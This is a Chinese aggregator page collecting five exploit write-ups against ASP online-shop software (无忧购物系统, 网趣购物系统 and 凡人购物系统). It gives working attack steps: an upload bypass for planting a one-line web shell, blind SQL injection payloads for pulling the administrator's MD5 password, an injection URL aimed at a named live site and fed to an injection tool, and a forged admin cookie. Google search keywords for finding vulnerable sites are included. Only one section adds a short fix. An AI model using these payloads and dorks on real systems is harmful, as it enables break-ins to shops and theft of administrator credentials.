无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全(精选5篇)由网友“huangdichen”投稿提供,下面小编为大家整理后的无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全,希望能帮助大家!
篇1:无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全
关键字:Copyright © - gzwynet.com.cn
上传利用地址:admin/upLoad_c.asp?a=uploadfile&b=1
利用文件:
无忧购物系统ASP时尚版上传漏洞利用程序 BY Qing
enctype=”multipart/form-data“ >
正在上传文件,请稍候...
bordercolorlight=”#cccccc“ bordercolordark=”#CCCCCC“ bgcolor=”#CCCCCC“>
文件上传 (允许上
传的文件类型: jpg gif)
选择文件:
nclick=”javascript.:mysub“>
上传一个JPG格式的小马或一句话
上传后的默认地址:admin/uploadfile/st.asp;(文件名)
如图
实际一句话地址:
利用文件:
无忧购物系统asp时尚版上传漏洞利用程序.html
down.qiannao.com/space/file/yulegu/share//10/1/-65e0-5fe7-8d2d-7269-7cfb-7edfasp-65f6-5c1a-7248-4e0a-4f20-6f0f-6d1e-5229-7528-7a0b-5e8f.html/.page
版本:无忧购物系统ASP通用版 V2010.9.17
漏洞:上传漏洞
关键字:Copyright©- gzwynet.com.cn (若有其他更好的关键字,希望能给我留下言)
利用前提:注册用户
漏洞文件:upfile_Other.asp
其中:
<%
if EnableUploadFile=”NO“ then
response.write ”系统未开放文件上传功能“
else
if session(”AdminName“)=”“ and session(”UserName“)=”“ then
response.Write(”请登录后再使用本功能!“)
else
select case upload_type
case 0
call upload_0() '使用化境无组件上传类
case else
'response.write ”本系统未开放插件功能“
'response.end
end select
end if
end if
%>
user,就是注册用户,也存在上传权限,其他的几个文件,如Upfile_Dialog.asp,Upfile_Photo.asp并没有普通用户的上传权限
那么我们现在就是要利用普通用户的这个可以上传的功能,
无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全
,
首先,注册个用户,如果没找到注册的地方,直接在网址后面输入userreg.asp,
注册并登录,
登录之后不要关闭页面,因为是session验证,现在我们打开这个本地上传页面,
修改action后的地址,并给马儿后面添加一个空格,点击上传就可以,图中红色所示部分就是空格,如图所示
复制页面上所示的木马地址,打开即可。
到此,拿到shell,完整结束。
附上本地上传的这个页面
down.qiannao.com/space/file/yulegu/share/2010/10/1/-672c-5730-4e0a-4f20-6f0f-6d1e.html/.page
篇2:网趣网上购物系统时尚版 v3.2注入漏洞
Cool Kid 's blog
涉及版本:网趣网上购物系统时尚版 v3.2
漏洞文件:getpwd2.asp,getpwd3.asp,getpwd4.asp
漏洞描述:变量username未经过滤带入sql查询,存在SQL注入漏洞.
关键代码:
ASP代码
<%
username=request.form(”username“)
set rs=Server.CreateObject(”Adodb.Recordset“)
sql=”select * from [user] where username='“&username”' “
rs.open sql,conn,1,1
If rs.eof Then
%>
<%
End If
%>
取回密码 | 回答问题
利用方法:
post提交数据(可以借用剑心的Sql.htm[www.loveshell.net/blog/blogview.asp?logID=70]),默认管理员ID为4,密码为16位md5(小写字母),确定下范围0-9的asc值48-57,小写字母的asc值97-122
SQL代码
' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 48 and 57)0 and ''='
' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 97 and 122)0 and ''='
正确返回”取回密码“,错误返回对话框”这个用户没有注册,请注册!“
篇3:网趣网上购物系统时尚版10.3注入漏洞及修复
网趣可以改名成洞趣了
网趣网上购物系统时尚版10.3在会员登录编辑订单处存在SQL注入,导致管理员密码被注入暴MD5漏洞,
漏洞:文件editorderform.asp,存在sql注入漏洞
关键字:inurl:trends.asp?id=
利用前提:注册用户下定单
分析:
源码如下:
<%dim zhuangtai,namekey
namekey=trim(request(”namekey“)) 只是单单过滤了空格而已
zhuangtai=trim(request(”zhuangtai“))
if zhuangtai=”“ then zhuangtai=request.QueryString(”zhuangtai“)
if namekey=”“ then namekey=request.querystring(”namekey“)
%>
………………
//按用户查询
if zhuangtai=0 or zhuangtai=”“ then
rs.open ”select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai<6 and username=“&namekey&” order by actiondate desc“,conn,1,1
else
rs.open ”select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai=“&zhuangtai&” and username=“&namekey&” order by actiondate“,conn,1,1
end if
admin目录下的editorderform.asp文件未做session验证,且对namekey过滤不严,直接导入查询产生SQL注入漏洞,
利用如下:
首先注册一个用户,随便找一样东西购买下一个定单,产生一个定单号。
如图:
好了,定单号产生,那么,我们接着就直接打开网站
www.chinasg.tk/admin/editorderform.asp?zhuangtai=0&namekey=qing
其中的namekey=qing,qing替换成你注册的用户名,
把这个URL放到NBSI当中,关键字为“1笔”,手动添加表名cnhww,结果如图所示:
好了,拿着跑出来的密码去cmd5解一下,再登录后台,
后台拿shell的话,备份和上传那里都可以,我就不详说了。
修复方案:
对admin目录下的editorderform.asp文件做session验证,对namekey严格过滤
篇4:网趣网上购物系统时尚版10.3注入漏洞漏洞预警
网趣网上购物系统时尚版10.3在会员登录编辑订单处存在SQL注入,导致管理员密码被注入暴MD5漏洞,
漏洞:文件editorderform.asp,存在sql注入漏洞
关键字:inurl:trends.asp?id=
利用前提:注册用户下定单
分析:
源码如下:
<%dim zhuangtai,namekey
namekey=trim(request(”namekey“)) 只是单单过滤了空格而已
zhuangtai=trim(request(”zhuangtai“))
if zhuangtai=”“ then zhuangtai=request.QueryString(”zhuangtai“)
if namekey=”“ then namekey=request.querystring(”namekey“)
%>
………………
'//按用户查询
if zhuangtai=0 or zhuangtai=”“ then
rs.open ”select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai<6 and username='“&namekey&”' order by actiondate desc“,conn,1,1
else
rs.open ”select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai=“&zhuangtai&” and username='“&namekey&”' order by actiondate“,conn,1,1
end if
admin目录下的editorderform.asp文件未做session验证,且对namekey过滤不严,直接导入查询产生SQL注入漏洞,
利用如下:
首先注册一个用户,随便找一样东西购买下一个定单,产生一个定单号。
如图:
好了,定单号产生,那么,我们接着就直接打开网站
www.chinasg.tk/admin/editorderform.asp?zhuangtai=0&namekey=qing
其中的namekey=qing,qing替换成你注册的用户名,
把这个URL放到NBSI当中,关键字为“1笔”,手动添加表名cnhww,结果如图所示:
好了,拿着跑出来的密码去cmd5解一下,再登录后台,
后台拿shell的话,备份和上传那里都可以,我就不详说了。
篇5:凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用
ad_chk.asp判断管理员登陆状态
<%
if Request.Cookies(”venshop“)(”admin_name“)=”“ or Request.Cookies(”venshop“)(”admin_pass“)=”“ or Request.Cookies(”venshop“)(”admin_class“)=”“ then
Response.Cookies(”venshop“)(”admin_name“)=”“
Response.Cookies(”venshop“)(”admin_pass“)=”“
Response.Cookies(”venshop“)(”admin_class“)=”“
response.redirect ”ad_login.asp“
response.end
end if
%>
判断admin_class
C:\Inetpub\wwwroot>findstr /i /n /s ”admin_class“ *.asp
ad_admin.asp:29: rs(”admin_class“)=request(”class1“)
ad_admin.asp:43:rs(”admin_class“)=request(”class“)
ad_admin.asp:92:<%if rs(”admin_class“)=0 then response.write” s
elected“%>>总管理员
ad_admin.asp:93:<%if rs(”admin_class“)=1 then response.write” s
elected“%>>产品管理
ad_admin.asp:94:<%if rs(”admin_class“)=2 then response.write” s
elected“%>>订单管理
........................
可以看出当admin_class=0的时候就是总管理员身份了,
凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用
,
伪造cookie如下
Themes=default; Count=lao=3; Countecho=lao=True; ASPSESSIONIDQAADRSRB=CDBDHEHCLJOIHFDAHLFHABIO; venshop=admin%5Fclass=0&admin%5Fpass=admin&admin%5Fname=admin
然后访问即可,后台有数据库备份可以拿webshell。
google :inurl:”views.asp?hw_id="
★ 旅游网站策划书
★ 商城年终总结
★ 入侵搜索关键字
【无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全(精选5篇)】相关文章:
扩展思维新方法后台拿shell2022-05-06
网站策划书2022-11-28
瑞星个人防火墙修复Windows系统漏洞教程2023-05-29
网上购物系统项目计划书2023-04-07
网站建设实训心得体会2023-08-09
教你做服务级的木马后门2023-07-09
网站推广策划书2022-08-19
网络层安全服务与攻击分析2023-12-10
网站建设策划书2023-02-22
电子商务网站建设策划书2022-09-17